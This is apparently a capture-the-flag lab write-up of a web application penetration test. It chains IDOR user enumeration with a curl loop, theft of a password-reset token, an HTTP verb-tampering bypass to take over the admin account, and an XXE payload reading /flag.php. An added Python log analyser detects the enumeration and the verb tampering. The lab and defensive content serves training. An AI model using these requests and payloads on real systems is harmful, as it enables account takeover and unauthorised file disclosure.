Skills Assessment
Task
You are performing a web application penetration test for a software development company, and they task you with testing the latest build of their social networking web application. Try to utilize the various techniques you learned in this module to identify and exploit multiple vulnerabilities found in the web application.
The login details are provided in the question below. Authenticate to with user “htb-student” and password “Academy_student!”
Try to escalate your privileges and exploit different vulnerabilities to read the flag at ‘/flag.php’.
Attempt
After logging in, this request was sent:
GET /api.php/user/74 HTTP/1.1
Host: 83.136.248.16:41942
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Referer: http://83.136.248.16:41942/profile.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 02:41:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"uid":"74","username":"htb-student","full_name":"Paolo Perrone","company":"Schaefer Inc"}
If the server only relies on the /74 part of the path, it could return another user. So I sent /1, looking for the admin, and got this result:
{"uid":"1","username":"s.applewhite","full_name":"Samanta Applewhite","company":"Daniel Inc"}
Not the admin, but the IDOR worked.
I ran a bash script:
❯ for uid in {1..100}; do curl -s "http://83.136.248.16:41942/api.php/user/$uid"; echo; done | grep -i "admin"
{"uid":"52","username":"a.corrales","full_name":"Amor Corrales","company":"Administrator"}
Now that I have the admin's username, I need their password.
There’s a password change feature so I captured a request:
POST /reset.php HTTP/1.1
Host: 83.136.248.16:41942
Content-Length: 62
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://83.136.248.16:41942
Referer: http://83.136.248.16:41942/settings.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
uid=74&token=e51a8a14-17ac-11ec-8e67-a3c050fe0c26&password=123
It uses a token, so even though I changed the uid there, I got access denied.
But there’s a request to get a token:
GET /api.php/token/74 HTTP/1.1
Host: 83.136.248.16:41942
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Referer: http://83.136.248.16:41942/settings.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=74
Connection: keep-alive
I got the token for uid=52 and used it to change the password. However, it was still access denied. I used verb tampering and changed POST to GET. It successfully bypassed the restriction, and now the admin password is 123.
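As an added defender-side example (not part of this writeup), the following Python script scans Apache access-log lines for the two patterns described above: one client walking /api.php/user/<uid> across many ids, and the reset endpoint being reached with GET instead of POST. The log lines, IP addresses, threshold and the list of state-changing endpoints are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache combined-log pattern: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Object-reference endpoints seen in the writeup (/api.php/user/<uid>, /api.php/token/<uid>).
OBJECT_API = re.compile(r"^/api\.php/(user|token)/(\d+)$")
# State-changing endpoints that should only be accepted over POST (assumption).
STATE_CHANGING = {"/reset.php", "/addEvent.php"}
ENUM_THRESHOLD = 10  # distinct ids requested by one client before flagging enumeration

def parse(line):
    # Return the fields of one access-log line, or None if it does not match.
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string before matching
    return rec

def analyse(lines):
    # Flag verb tampering on state-changing endpoints and per-client id enumeration.
    ids_by_ip = defaultdict(set)
    findings = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        m = OBJECT_API.match(rec["path"])
        if m:
            ids_by_ip[rec["ip"]].add(m.group(2))
        if rec["path"] in STATE_CHANGING and rec["method"] != "POST":
            findings.append(("verb_tampering", rec["ip"], f'{rec["method"]} {rec["path"]}'))
    for ip, ids in ids_by_ip.items():
        if len(ids) >= ENUM_THRESHOLD:
            findings.append(("idor_enumeration", ip, f"{len(ids)} distinct ids"))
    return findings

def constructed_log():
    # Constructed sample lines modelled on the writeup's traffic, not real server logs.
    fmt = '10.0.0.5 - - [09/Mar/2025:02:41:{:02d} +0000] "GET /api.php/user/{} HTTP/1.1" 200 90 "-" "curl/8.5.0"'
    lines = [fmt.format(i, uid) for i, uid in enumerate(range(1, 16))]
    # A reset sent with GET also leaves the token and new password in the access log.
    lines.append('10.0.0.5 - - [09/Mar/2025:02:45:00 +0000] "GET /reset.php?uid=52&token=TOKEN&password=123 HTTP/1.1" 200 12 "-" "Mozilla/5.0"')
    lines.append('10.0.0.9 - - [09/Mar/2025:02:46:00 +0000] "POST /reset.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"')
    lines.append('10.0.0.9 - - [09/Mar/2025:02:46:01 +0000] "GET /api.php/user/74 HTTP/1.1" 200 90 "-" "Mozilla/5.0"')
    return lines
```

Running analyse(constructed_log()) reports the GET to /reset.php and the 15-id walk from the same client; a single profile lookup from the other client stays below the threshold.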
Comparing the first user and the admin, I noticed there is an add-event feature for the admin:
POST /addEvent.php HTTP/1.1
Host: 83.136.248.16:41942
Content-Length: 167
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://83.136.248.16:41942
Referer: http://83.136.248.16:41942/event.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=p8n6ip0sa52o0qpeei3327ccsc; uid=52
Connection: keep-alive
<root>
<name>EVENTNAME</name>
<details>EVENTDETAILS</details>
<date>2025-03-09</date>
</root>
Though it doesn't have an XML declaration, from the structure it's XML. There should be an XXE vulnerability here.
Payload:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php" >
]>
<root>
<name>&xxe;</name>
</root>
Got the base64-encoded flag, decoded it with Burp, and done.